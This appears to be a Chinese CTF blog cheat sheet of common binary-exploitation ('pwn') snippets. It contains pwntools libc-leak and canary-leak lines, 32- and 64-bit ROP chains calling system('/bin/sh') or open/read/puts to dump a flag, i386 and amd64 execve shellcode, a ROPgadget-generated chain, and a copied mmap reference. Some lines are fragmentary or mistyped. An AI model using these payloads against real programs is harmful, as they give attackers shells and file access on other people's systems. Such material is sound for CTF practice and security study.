Pwn常用指令

Posted by Mr.Be1ieVe on Wednesday, February 5, 2020

ldd filename 读取libc

ROPgadget --binary filename --only "pop|ret"

__libc_start_main = u64(sh.recvuntil("\x7f")[-6:].ljust(8,'\x00'))

__libc_start_main = u32(sh.recvuntil("\xf7")[-4:])

__libc_start_main = u32(sh.recv(4))

canary = u64(sh.recv(7).rjust(8,"\x00")) log.success("canary------>" + hex(canary))

接受成int型地址:str_addr = int(sh.recvuntil("\n",True),16)

seccomp-tools dump ./filename

找不到flag:grep -rn flag *

32位

第一个放在rdi 第二个放在rsi 第三个放在rdx

64位就得

32位

print

 payload += p32(printf_plt)
 payload += p32(start_vuln)
 payload += p32(0x080486F8)
 payload += p32(elf.got['__libc_start_main'])

system("/bin/sh")

payload += p32(system)
payload += p32(0)
payload += p32(binsh)
sh.sendline(payload)

write

payload += p32(elf.plt['write'])
payload += p32(pop_esi_edi_ebp_ret)
payload += p32(1)
payload += p32(elf.got['__libc_start_main'])
payload += p32(4)
payload += p32(start_main)

read

payload += p32(elf.plt['read'])
payload += p32(pop3_ret)
payload += p32(0) #从哪里读取
payload += p32(bss_addr)
payload += p32(0x223) #长度

64

main_arena = u64(io.recv(6).ljust(8,'\x00'))-88
log.success('main arena: '+hex(main_arena))
libc_base = main_arena - 0x3c4b20
log.success('libc base: '+hex(libc_base))2.
libc_base = u64(sh.recv(8)) - 0x3C4B78
malloc_hook = libc_base + libc.symbols['__malloc_hook']
log.success("libc_base: " + hex(libc_base))
log.success("__malloc_hook: " + hex(malloc_hook))

system

payload += p64(pop_rdi_ret)
payload += p64(binsh)
payload += p64(system)
sh.sendline(payload)

printf

payload += p64(pop_rdi_ret)
payload += p64(elf.got['__libc_start_main'])
payload += p64(elf.plt['printf'])
payload += p64(start_main)

write

payload += p64(pop_rdi_ret)
payload += p64(1)
payload += p64(pop_rsi_r15_ret)
payload += p64(elf.got['__libc_start_main'])
payload += p64(1)
payload += p64(elf.plt['write'])
payload += p64(start_main)

32

read

payload =p32(elf.plt['read']) 
payload += p32(pop3_ret) 
payload += p32(0) 
payload += p32(base)
payload += p32(0x500)

write

payload += p32(elf.plt['write'])
payload += p32(pop3_ret)
payload += p32(1)
payload += p32(elf.got['__libc_start_main'])
payload += p32(4)
payload += p32(start_main)

64

puts

payload += p64(pop_rdi_ret)
payload += p64(elf.got['__libc_start_main'])
payload += p64(elf.plt['puts'])

system("/bin/sh")

payload += p64(pop_rdi_ret)
payload += p64(binsh)
payload += p64(system)
sh.sendline(payload)

read

payload += p64(pop_rsi_ret)
payload += p64(elf.bss()) 
payload += p64(elf.plt['read'])

open

payload += p64(pop_rdi_ret)
payload += p64(elf.bss()+0x100)
payload += p64(pop_rsi_ret)
payload += p64(0)
payload += p64(elf.plt['open'])

open_read_put

image-20200128101042088

    payload += p64(pop_rsi_ret)
    payload += p64(elf.bss()+0x100)
    payload += p64(elf.plt['read'])

    payload += p64(pop_rdi_ret)
    payload += p64(elf.bss()+0x100)
    payload += p64(pop_rsi_ret)
    payload += p64(0)
    payload += p64(elf.plt['open'])
    
    payload += p64(pop_rdi_ret)
    payload += p64(4)#?
    payload += p64(pop_rsi_ret)
    payload += p64(elf.bss()+0x100)
    payload += p64(elf.plt['read'])
    
    payload += p64(pop_rdi_ret)
    payload += p64(elf.bss()+0x100)
    payload += p64(elf.plt['puts'])

i386

可参考http://mrbelieve.tech/2020/01/24/ciscn_2019_s_9/

shellcode ='''
xor    eax,eax
push   eax
push   0x68732f2f #//sh
push   0x6e69622f # /bin
mov    ebx,esp
mov    ecx,eax
mov    edx,eax
mov    al,0xb
int    0x80
xor    eax,eax
inc    eax
int    0x80
'''
shellcode =asm(shellcode) #使用shellcraft.sh打不通,估计是因为太长了
shell="sub esp,0x28;call esp"
shell =asm(shell)

amd64

push 0x67616c66
mov rdi,rsp 
push 2
pop rax
xor rsi,rsi
push 32
pop rdx
syscall
mov rdi,rax
mov rsi,rsp
xor rax,rax
syscall
push 1
pop rdi
push 1
pop rax
syscall
push   0x42
pop    rax
inc    ah
cqo
push   rdx
movabs rdi, 0x68732f2f6e69622f

push   rdi
push   rsp
pop    rsi
mov    r8, rdx
mov    r10, rdx
syscal
xor    %rsi,%rsi
push   %rsi
mov $0x68732f2f6e69622f,%rdi
push   %rdi
push   %rsp
pop    %rdi
push  $0x3b
pop    %rax
cltd   
syscall 

mmap

void *mmap(void *start,size_t length,int prot,int flags,int fd,off_t offsize);

参数start:指向欲映射的内存起始地址,通常设为 NULL,代表让系统自动选定地址,映射成功后返回该地址。

参数length:代表将文件中多大的部分映射到内存。

参数prot:映射区域的保护方式。可以为以下几种方式的组合: PROT_EXEC 映射区域可被执行 PROT_READ 映射区域可被读取 PROT_WRITE 映射区域可被写入 PROT_NONE 映射区域不能存取

参数flags:影响映射区域的各种特性。在调用mmap()时必须要指定MAP_SHARED 或MAP_PRIVATE。 MAP_FIXED 如果参数start所指的地址无法成功建立映射时,则放弃映射,不对地址做修正。通常不鼓励用此旗标。 MAP_SHARED 对映射区域的写入数据会复制回文件内,而且允许其他映射该文件的进程共享。 MAP_PRIVATE 对映射区域的写入操作会产生一个映射文件的复制,即私人的“写入时复制”(copy on write)对此区域作的任何修改都不会写回原来的文件内容。 MAP_ANONYMOUS 建立匿名映射。此时会忽略参数fd,不涉及文件,而且映射区域无法和其他进程共享。 MAP_DENYWRITE 只允许对映射区域的写入操作,其他对文件直接写入的操作将会被拒绝。 MAP_LOCKED 将映射区域锁定住,这表示该区域不会被置换(swap)。

参数fd:要映射到内存中的文件描述符。如果使用匿名内存映射时,即flags中设置了MAP_ANONYMOUS,fd设为-1。有些系统不支持匿名内存映射,则可以使用fopen打开/dev/zero文件,然后对该文件进行映射,可以同样达到匿名内存映射的效果。

参数offset:文件映射的偏移量,通常设置为0,代表从文件最前方开始对应,offset必须是分页大小的整数倍。 ———————————————— 版权声明:本文为CSDN博主「为幸福写歌」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.csdn.net/yzy1103203312/article/details/78286360

from struct import pack 
p = lambda x : pack('I', x)
IMAGE_BASE_0 = 0x08048000 # ./simplerop
rebase_0 = lambda x : p(x + IMAGE_BASE_0)
rop = ''
rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 
rop += '/bin'
rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 
rop += rebase_0(0x000a3060)
rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret; 
rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 
rop += '/sh\x00'
rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; 
rop += rebase_0(0x000a3064)
rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret;
rop += pack('I', pop_edx_ecx_ebx)
rop += p(0)
rop += p(0)
rop += rebase_0(0x000a3060)
rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; 
rop += p(0x0000000b)
rop += rebase_0(0x00026ef0) # 0x0806eef0: int 0x80; ret; 

「真诚赞赏,手留余香」

Mr.Be1ieVe's Treasure

真诚赞赏,手留余香

使用微信扫描二维码完成支付